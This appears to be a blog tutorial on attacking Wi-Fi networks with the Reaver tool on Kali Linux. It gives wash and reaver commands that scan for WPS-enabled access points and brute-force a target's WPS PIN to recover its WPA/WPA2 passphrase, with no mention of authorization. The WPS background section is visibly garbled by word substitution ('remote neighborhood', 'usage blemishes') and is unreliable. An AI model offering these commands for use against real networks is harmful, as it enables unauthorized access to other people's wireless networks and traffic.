Hacking Wi-Fi using Reaver

Reaver has been designed to be a practical attack against Wi-Fi Protected Setup(WPS) registrar PINs in order to recover WPA/WPA2 passphrases and has been tested against different access points and WPS implementations.

Wi-Fi Protected Setup (WPS)

Wi-Fi Protected Setup™ is a discretionary affirmation program from the Wi-FiAlliance that is intended to facilitate the assignment of setting up and arranging security on remote neighborhood. Presented by the Wi-Fi Alliance in mid 2007, the program gives an all inclusive arrangement of system setup answers for homes and little office (SOHO) situations.
Wi-Fi Protected Setup empowers run of the mill clients who have small comprehension of conventional Wi-Fi design and security settings to consequently arrange new remote systems, include new gadgets what’s more, empower security. More than 200 items have been Wi-Fi CERTIFIED™ for Wi-Fi Protected Setup since the program was launced (sic!) in January 2007.”
The Wi-Fi Simple Configuration Specification (WSC) is the basic innovation for the Wi-Fi Ensured Setup accreditation.

All real merchants (counting Cisco/LinksysNetgearD-LinkBelkinBuffalo,ZyXEL and Technicolor) have WPS-ensured gadgets, different merchants (eg. TP-Link) send gadgets with WPS-bolster which are not WPS-confirmed. WPS is actuated naturally on all gadgets I approached.
Despite the fact that WPS is advertised similar to a safe method for arranging a remote gadget, there are outline also, usage blemishes which empower an aggressor to access a generally adequately secured remote system.

Reaver on Kali Linux



On Kali Linux Reaver is already installed, you can show the tools included on the reaver package with the help command :
root@kali:~# reaver -h
Reaver can use Wash as a WPS Scan Tool, to show help use :
root@kali:~# wash -h
This is a wash using example, Scan for networks using the monitor mode interface (-i mon0) on channel 6 (-c 6), while ignoring frame checksum errors (-C):
root@kali:~# wash -i mon0 -c 6 -C
An example using Reaver on kali linux to brute force Wi-Fi, Use the monitor mode interface (-i mon0) to attack the access point (-b E0:3F:49:6A:57:78), displaying verbose output (-v):
root@kali:~# reaver -i mon0 -b E0:3F:49:6A:57:78 -v
Note: For the person who encountered an error using Reaver on Kali Linux you need to install some build-time dependencies: 
  • libpcap-dev
  • build-essentials
Use this command to install it :
root@kali:~# sudo apt -y install build-essential libpcap-dev

How To Use Reaver on Kali Linux


This video will show you how to use Reaver on Kali Linux to Brute Force Wi-Fi:

Hacking Wi-Fi using Reaver Hacking Wi-Fi using Reaver Reviewed by Moonlesknight on 21:33:00 Rating: 5

No comments:

ads 728x90 B
Powered by Blogger.